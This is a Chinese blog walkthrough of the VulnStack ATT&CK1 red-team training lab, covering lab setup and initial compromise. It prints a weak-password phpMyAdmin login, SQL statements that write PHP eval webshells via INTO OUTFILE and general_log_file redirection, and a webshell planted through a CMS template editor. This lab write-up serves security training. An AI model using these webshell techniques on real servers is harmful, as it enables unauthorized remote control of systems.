看完这篇 教你玩转ATK&CK1红队评估实战靶场Vulnstack(一)上

本文介绍了ATK&CK1红队实战靶场的环境搭建与渗透测试过程。首先,通过nmap进行信息收集,发现80端口敏感信息泄漏并利用弱口令获取PHPMyAdmin后台。接着,利用MySQL日志文件实现GetShell。最后,渗透yxcms CMS,上传并执行一句话木马,成功获得后台控制权。
摘要由CSDN通过智能技术生成

ATK&CK1红队实战靶场介绍:

开源靶场VulnStack是由国内红日安全团队打造一个靶场知识平台。靶场设计思路来源ATT&CK红队评估模式,从漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场 虚拟机所有统一密码:hongrisec@2019

ATK&CK1红队实战靶场下载:

靶场下载:https://pan.baidu.com/s/1EUDMSJEHVbuUL-YfB6tZ3g?pwd=7q7v 提取码:7q7v

ATK&CK1红队实战靶场环境搭建:

网络拓补图:
在这里插入图片描述

靶机ip类型
Kali linux (IP:192.168.205.130)攻击机
win7双网卡,vmnet1和vmnet2,(内网ip:192.168.52.143,外网IP:192.168.205.130)web服务器
win2k3,vmnet2,(IP:192.168.52.141)域成员主机
winserver 2008 r2,vmnet2 ,(IP:192.168.52.138)内网域控主机

win7靶机环境配置:
在这里插入图片描述
在这里插入图片描述
Windows Server 2008 R2靶机环境配置:
在这里插入图片描述
在这里插入图片描述
Win2k3 环境配置:
在这里插入图片描述
在这里插入图片描述
现在需要ping一下测试一下所有网络是不是都是通的

内网通信:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
外网通信测试:

PS:需要注意的是win7 需要关闭防火墙不然ping不通
在这里插入图片描述
在这里插入图片描述
然后在win7 打开phpStudy 访问网站 发现没啥问题环境搭建完成。
在这里插入图片描述
在这里插入图片描述

ATK&CK1红队实战靶场渗透详解:

①:信息收集:

使用命令:nmap -sS -sV -T4 -n 192.168.205.128

在这里插入图片描述
先访问一下80端口 发现是 敏感信息泄漏
在这里插入图片描述
然后在下面发现可以检测数据库尝试一下 root ,root 弱口令 连接成功!
在这里插入图片描述

使用dirb 扫一下后台网站 发现了后台网站:http://192.168.205.128/phpmyadmin/ 然后进访问登入(刚刚的弱口令) 发现登入成功!!

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:漏洞利用:

找到SQL导航栏 使用select @@basedir; 知道了MySql的路径 尝试写一句话木马上传 发现写入失败。

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\hack.php';

在这里插入图片描述
在这里插入图片描述
既然不行那就换一种思路:利用MySql 日志 文件 ,Mysql 5.0版本以上会创建日志文件,通过修改日志的全局变量,也可以getshell

general log 指的是日志保存状态,ON代表开启 OFF代表关闭;
general log file 指的是日志的保存路径。

使用命令查看日志文件:show variables like '%general%';
在这里插入图片描述
当开启 general_log 执行的 SQL 语句都会出现在 stu1.log 文件中。那么如果修改 general_log_file 的值,则所执行的 SQL 语句就会对应生成对应的文件中,进而可 Getshell

使用命令:SET GLOBAL general_log='on'
在这里插入图片描述
在这里插入图片描述

使用命令:SET GLOBAL general_log_file='C:/phpStudy/www/hack.php'; 指定日志写入到网站根目录的 hack.php 文件中

在这里插入图片描述
在这里插入图片描述
使用命令:SELECT '<?php eval($_POST["cmd"]);?>' 写入一句话木马 访问hack.php运行脚本 使用菜刀🔪连接 连接成功!!!
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

③:CMS后台上传GetShell:

通过上面的渗透测试我们发现了phpStudy 下面还有一个 yxcms的文件夹 估计也是个后台 随便翻了一下 发现有提示 尝试登入后台 成功!!
在这里插入图片描述
在这里插入图片描述
在前台模板中——管理模板文件 ——新建一个shell.php—— 写入一句话木马
在这里插入图片描述
在这里插入图片描述

/yxcms/protected/apps/default/view/default/路径下找到了shell.php 然后访问shell.php即可,上菜刀 连接成功!!

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
是最高管理员权限(但是只是个域用户)

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值